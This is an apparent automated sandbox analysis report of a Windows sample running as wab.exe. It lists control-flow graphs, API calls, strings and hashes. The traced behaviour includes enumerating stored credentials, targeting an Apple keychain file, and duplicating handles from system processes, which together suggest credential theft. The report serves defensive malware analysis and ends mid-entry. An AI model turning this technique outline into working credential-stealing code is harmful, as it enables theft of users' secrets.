                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                • API String ID: 594330280-3398334509
                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 659 413e6a-413e76 655->659 656->655 661 413e46-413e5c GetProcAddress 656->661 657->658 658->639 659->651 661->655 663->642
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                • API String ID: 912665193-1740548384
                                                                                                                                                • Opcode ID: 05c61bdc91198e39abb6d6ee7ce09e8b8423f2cda011bdf5068888dae1005bc1
                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                • Opcode Fuzzy Hash: 05c61bdc91198e39abb6d6ee7ce09e8b8423f2cda011bdf5068888dae1005bc1
                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                • String ID: BIN
                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                • memset.MSVCRT ref: 00406F8B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                  • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2420179184-0
                                                                                                                                                • Opcode ID: 012147614db75ad7d67ccecdea64e9ae07fb8256dddfad28ba7583e0197446fa
                                                                                                                                                • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                • Opcode Fuzzy Hash: 012147614db75ad7d67ccecdea64e9ae07fb8256dddfad28ba7583e0197446fa
                                                                                                                                                • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                • API String ID: 2745753283-3798722523
                                                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 482 40bb30-40bb3a 474->482 475->472 477 40b9dd-40ba25 call 447280 call 447960 475->477 477->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 477->492 485 40bb3c 482->485 486 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 482->486 483->440 485->486 486->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
